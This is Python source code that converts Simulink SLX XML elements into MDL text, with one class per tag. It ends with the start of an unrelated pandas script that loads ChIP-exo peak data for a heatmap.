self.modelWorkspaces.append(ModelWorkspace.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'WindowsInfo':
self.windowsInfos.append(WindowsInfo.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigSet':
self.configSets.append(ConfigSet.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockDiagramDefaults':
self.blockDiagramDefaults.append(BlockDiagramDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Verification':
self.verifications.append(Verification.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'ConfigurationSet':
self.configurationSets.append(ConfigurationSet.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'SystemDefaults':
self.systemDefaultss.append(SystemDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockDefaults':
self.blockDefaultss.append(BlockDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'AnnotationDefaults':
self.annotationDefaultss.append(AnnotationDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'LineDefaults':
self.lineDefaultss.append(LineDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskDefaults':
self.maskDefaultss.append(MaskDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'MaskParameterDefaults':
self.maskParameterDefaultss.append(MaskParameterDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'BlockParameterDefaults':
self.blockParameterDefaultss.append(BlockParameterDefaults.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'EngineSettings':
self.engineSettingss.append(EngineSettings.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelOrLibraryOrSubsystem' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelOrLibraryOrSubsystem(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = f'{self.tag} {{\n' # can be Model or Library
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.configManagerSettings:
str_ += f'{x.strmdl}\n'
for x in self.editorSettings:
str_ += f'{x.strmdl}\n'
for x in self.simulationSettings:
str_ += f'{x.strmdl}\n'
for x in self.externalModes:
str_ += f'{x.strmdl}\n'
for x in self.modelReferenceSettings:
str_ += f'{x.strmdl}\n'
for x in self.concurrentExecutionSettings:
str_ += f'{x.strmdl}\n'
for x in self.systems:
str_ += f'{x.strmdl}\n'
for x in self.diagnosticSuppressors:
str_ += f'{x.strmdl}\n'
for x in self.logicAnalyzerPlugins:
str_ += f'{x.strmdl}\n'
for x in self.notesPlugins:
str_ += f'{x.strmdl}\n'
for x in self.sLCCPlugins:
str_ += f'{x.strmdl}\n'
for x in self.webScopes_FoundationPlugins:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
for x in self.graphicalInterfaces:
str_ += f'{x.strmdl}\n'
for x in self.userParameters:
str_ += f'{x.strmdl}\n'
for x in self.modelWorkspaces:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.windowsInfos:
str_ += f'{x.strmdl}\n'
for x in self.configSets:
str_ += f'{x.strmdl}\n'
for x in self.blockDiagramDefaults:
str_ += f'{x.strmdl}\n'
for x in self.verifications:
str_ += f'{x.strmdl}\n'
for x in self.configurationSets:
str_ += f'{x.strmdl}\n'
for x in self.systemDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.blockDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.annotationDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.lineDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.maskDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.maskParameterDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.blockParameterDefaultss:
str_ += f'{x.strmdl}\n'
for x in self.engineSettingss:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
str_ = Utils.remove_multiple_linegaps(str_)
str_ = Utils.replacements4mdl(str_)
str_ = Utils.remove_multiple_linegaps_between_consecutive_closing_braces(str_)
return str_
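The `Utils` helpers called in `strmdl` above are defined elsewhere in this project; as a rough, hypothetical sketch of what `remove_multiple_linegaps` is assumed to do (the real implementation may differ):

```python
import re

# Hypothetical sketch of Utils.remove_multiple_linegaps (the real helper
# lives elsewhere): collapse any run of blank lines into a single blank line.
def remove_multiple_linegaps(text):
    return re.sub(r'\n{3,}', '\n\n', text)
```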
class ModelReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelReference') and strval.endswith('</ModelReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'ModelReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class ModelReferenceSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelReferenceSettings') and strval.endswith('</ModelReferenceSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelReferenceSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelReferenceSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class ModelWorkspace(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<ModelWorkspace') and strval.endswith('</ModelWorkspace>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'ModelWorkspace' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return ModelWorkspace(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class NotesPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<NotesPlugin') and strval.endswith('</NotesPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'NotesPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return NotesPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class Object(XmlElement):
    # TODO: what is $ObjectID in mdl? (it is generated)
    # There is an ObjectID in the xml, but it does not match mdl's $ObjectID.
    # Figure out how to generate it.
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Object') and strval.endswith('</Object>')
super().__init__(strval, parent_xml)
self.object_idmdl = Utils.object_idmdl_by_xml_element(self)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.arrays = []
self.objects = [] # <Object> can contain children <Object>
self.customPropertys = [] # first found in corpus/github-downloaded/CSEI_u.slx
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'CustomProperty':
self.customPropertys.append(CustomProperty.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Object' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Object(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
# special
# these <Object> tags are found in configSet0.xml
if self.attr_value_by_name('ClassName') in [
'Simulink.ConfigSet',
'Simulink.SolverCC',
'Simulink.DataIOCC',
'Simulink.OptimizationCC',
'Simulink.DebuggingCC',
'Simulink.HardwareCC',
'Simulink.ModelReferenceCC',
'Simulink.SFSimCC',
'Simulink.RTWCC',
'SlCovCC.ConfigComp',
'hdlcoderui.hdlcc'
]:
element_name = self.attr_value_by_name('ClassName')
else:
element_name = 'Object' # default
str_ = f'{element_name} {{\n'
for x in self.attrs:
name = x.name
value = x.value
if x.name in ['ClassName', 'ObjectID', 'PropName']:
name = '$' + name
if x.name in ['BackupClass', 'ClassName', 'PropName', 'Version']:
value = f'"{x.value}"'
if x.name == 'ObjectID':
value = self.object_idmdl
str_ += f'{name} {value}\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
for x in self.customPropertys:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
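The attribute rendering inside `Object.strmdl` applies three overlapping rules (`$`-prefixing, quoting, and ObjectID substitution). A standalone restatement of those rules, as a hypothetical helper for testing in isolation (the function and its signature are illustrative, not part of this module):

```python
# Hypothetical sketch of Object.strmdl's per-attribute rules:
# - ClassName/ObjectID/PropName get a '$' prefix in mdl
# - BackupClass/ClassName/PropName/Version values are quoted
# - ObjectID's value is replaced by the generated mdl id
def format_object_attr(name, value, object_idmdl=None):
    out_name = '$' + name if name in ('ClassName', 'ObjectID', 'PropName') else name
    if name == 'ObjectID':
        out_value = object_idmdl
    elif name in ('BackupClass', 'ClassName', 'PropName', 'Version'):
        out_value = f'"{value}"'
    else:
        out_value = value
    return f'{out_name} {out_value}'
```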
class Option(XmlElement):
# first found in design-model-behavior/prioritydemo
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Option') and strval.endswith('</Option>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Option(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Cell "{self.content}"'
class Outport(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Outport') and strval.endswith('</Outport>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Outport' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Outport(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Outport {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class P(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<P') and strval.endswith('</P>')
super().__init__(strval, parent_xml)
self.name_attr = None
self.class_attr = None
for x in self.attrs:
if x.name == 'Name':
self.name_attr = x
if x.name == 'Class':
self.class_attr = x
@classmethod
def from_XmlElement(cls, xml_element):
return P(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
quoted = f'{self.name_attr.value} "{self.content}"' # default
unquoted = f'{self.name_attr.value} {self.content}'
boxed = f'{self.name_attr.value} [{self.content}]'
unquoted_indented = f' {self.name_attr.value} {self.content}'
# order rules by priority.
if '"' in self.content: # content contains double quotes i.e. "
return quoted
        # OBSERVATION: if these are not indented, model comparison shows differences -- reason unknown
        # TODO: if mdl-prettification is implemented, this can be removed, as prettifying the mdl
        # will introduce the indentation by itself
if self.name_attr and self.name_attr.value in [
'rep_seq_t', # see applications/sldemo_hydroid
'rep_seq_y', # see applications/sldemo_hydroid
]:
return unquoted_indented
if self.name_attr and self.name_attr.value in [
'Components', # mandatory
'Location', # mandatory
'Position',
]:
return unquoted
        # Contents starting and ending with [ and ] respectively are MOSTLY unquoted.
        # However, if some P tags with such content do need to be quoted,
        # put their names in the list inside this rule.
if self.content.startswith('[') and self.content.endswith(']'):
# special
if self.name_attr and self.name_attr.value in [
]:
return quoted
# default
return unquoted
if self.content in ['on', 'off']:
return unquoted
if self.class_attr:
if self.class_attr.value == 'double':
if self.content.startswith('[') and self.content.endswith(']'):
return unquoted
return boxed
if self.class_attr.value in ['logical', 'int32', 'uint32']:
return boxed
return quoted
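The rule cascade in `P.strmdl` is easiest to check in isolation. A hedged standalone restatement of the same priorities (the helper name and flat signature are assumptions made for illustration; the real logic lives in the property above):

```python
# Hypothetical sketch of P.strmdl's priority-ordered quoting rules.
def format_p_value(name, content, class_=None):
    if '"' in content:                         # embedded quotes force the quoted form
        return f'{name} "{content}"'
    if name in ('rep_seq_t', 'rep_seq_y'):     # observed: must be indented, unquoted
        return f'    {name} {content}'
    if name in ('Components', 'Location', 'Position'):
        return f'{name} {content}'             # always unquoted
    if content.startswith('[') and content.endswith(']'):
        return f'{name} {content}'             # bracketed vectors stay unquoted
    if content in ('on', 'off'):
        return f'{name} {content}'
    if class_ in ('double', 'logical', 'int32', 'uint32'):
        return f'{name} [{content}]'           # boxed numeric classes
    return f'{name} "{content}"'               # default: quoted
```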
class Port(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Port') and strval.endswith('</Port>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.arrays = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Array':
self.arrays.append(Array.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Port' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Port(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Port {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.arrays:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Prompt(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Prompt') and strval.endswith('</Prompt>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Prompt(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Prompt "{self.content}"'
class Range(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Range') and strval.endswith('</Range>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Range(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Range {self.content}'
class RequireFunction(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<RequireFunction') and strval.endswith('</RequireFunction>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'RequireFunction' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return RequireFunction(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'RequireFunction {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class SimulationSettings(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SimulationSettings') and strval.endswith('</SimulationSettings>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for x in self.inner_xmls:
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SimulationSettings' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SimulationSettings(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class SLCCPluginPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SLCCPlugin') and strval.endswith('</SLCCPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SLCCPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SLCCPluginPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class SubsystemReference(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SubsystemReference') and strval.endswith('</SubsystemReference>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SubsystemReference' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SubsystemReference(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'SubsystemReference {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class System(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<System') and strval.endswith('</System>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.blocks = []
self.lines = []
self.annotations = []
self.lists = []
self.functionConnectors = []
self.connectors = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Block':
self.blocks.append(Block.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Line':
self.lines.append(Line.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Annotation':
self.annotations.append(Annotation.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'List':
self.lists.append(List.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'FunctionConnector':
self.functionConnectors.append(FunctionConnector.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Connector':
self.connectors.append(Connector.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'System' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return System(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'System {\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.blocks:
str_ += f'{x.strmdl}\n'
for x in self.lines:
str_ += f'{x.strmdl}\n'
for x in self.annotations:
str_ += f'{x.strmdl}\n'
for x in self.lists:
str_ += f'{x.strmdl}\n'
for x in self.functionConnectors:
str_ += f'{x.strmdl}\n'
for x in self.connectors:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class SystemDefaults(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<SystemDefaults') and strval.endswith('</SystemDefaults>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'SystemDefaults' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return SystemDefaults(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'System {\n' # SystemDefaults appears as System only
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class TabName(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TabName') and strval.endswith('</TabName>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return TabName(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'TabName "{self.content}"'
class TestPointedSignal(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TestPointedSignal') and strval.endswith('</TestPointedSignal>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'TestPointedSignal' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return TestPointedSignal(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'TestPointedSignal {\n'
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Tooltip(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Tooltip') and strval.endswith('</Tooltip>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Tooltip(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Tooltip "{self.content}"'
class Type(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Type') and strval.endswith('</Type>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Type(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Type "{self.content}"'
class UserParameters(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<UserParameters') and strval.endswith('</UserParameters>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'UserParameters' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return UserParameters(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class TypeOptions(XmlElement):
# first found in design-model-behavior/prioritydemo
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<TypeOptions') and strval.endswith('</TypeOptions>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.options = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Option':
self.options.append(Option.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'TypeOptions' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return TypeOptions(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = 'Array {\n' # special
str_ += 'Type "Cell"\n'
str_ += f'Dimension {len(self.inner_xmls_of_type_xml)}\n'
str_ += 'PropName "TypeOptions"\n' # required
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.options:
str_ += f'{x.strmdl}\n'
str_ += '}\n\n'
return str_
class Value(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Value') and strval.endswith('</Value>')
super().__init__(strval, parent_xml)
@classmethod
def from_XmlElement(cls, xml_element):
return Value(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
return f'Value "{self.content}"'
class Verification(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<Verification') and strval.endswith('</Verification>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'Verification' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return Verification(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
# special: this tag was found in matlab-central/Baro_Library
# but the content was not found in corresponding mdl format
return ''
# str_ = 'Verification {\n'
# for x in self.attrs:
# str_ += f'{x.name} "{x.value}"\n'
# for x in self.ps:
# str_ += f'{x.strmdl}\n'
# str_ += '}\n\n'
# return str_
class WebScopes_FoundationPlugin(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<WebScopes_FoundationPlugin') and strval.endswith('</WebScopes_FoundationPlugin>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'WebScopes_FoundationPlugin' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return WebScopes_FoundationPlugin(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = '' # special
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
class WindowsInfo(XmlElement):
def __init__(self, strval, parent_xml):
strval = strval.strip()
assert strval.startswith('<WindowsInfo') and strval.endswith('</WindowsInfo>')
super().__init__(strval, parent_xml)
innerxml_used = {x: False for x in self.inner_xmls if x.type == 'xml'}
self.ps = []
self.objects = []
for x in self.inner_xmls:
if x.tag == 'P':
self.ps.append(P.from_XmlElement(x))
innerxml_used[x] = True
if x.tag == 'Object':
self.objects.append(Object.from_XmlElement(x))
innerxml_used[x] = True
for ix, u in innerxml_used.items():
if not u:
raise Exception(f"Inner XML of 'WindowsInfo' not used.\nUnused XML:\n\n{ix.strval}")
@classmethod
def from_XmlElement(cls, xml_element):
return WindowsInfo(xml_element.strval, xml_element.parent_xml)
@property
def strmdl(self):
str_ = ''
for x in self.attrs:
str_ += f'{x.name} "{x.value}"\n'
for x in self.ps:
str_ += f'{x.strmdl}\n'
for x in self.objects:
str_ += f'{x.strmdl}\n'
str_ += '\n\n'
return str_
if __name__ == '__main__':
pass
# -*- coding: utf-8 -*-
"""
Python SubFunction for creating the HeatMap Data
Part of the Supplementary Information
@author: Christoph S. Boerlin; Chalmers University of Technology, Gothenburg Sweden
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
selectedTFandConds={'Ino2':'Glu','Stb5':'Nit','Gcn4':'Glu','Cbf1':'Ana'}
path='C:/Users/borlinc/Documents/Projects/190219_ChipExoPipeline/SupplementaryInformation/'
pathToGEM=path+'GEM_Files/'
pathToTF=path+'ReadData/'
for TF, cond in selectedTFandConds.items():
    # load histogram data
    histogramData = pd.read_csv(path + TF + '_' + cond + '_PeakHistogramData.csv', sep='\t', index_col=0)
    # sort peaks after read count
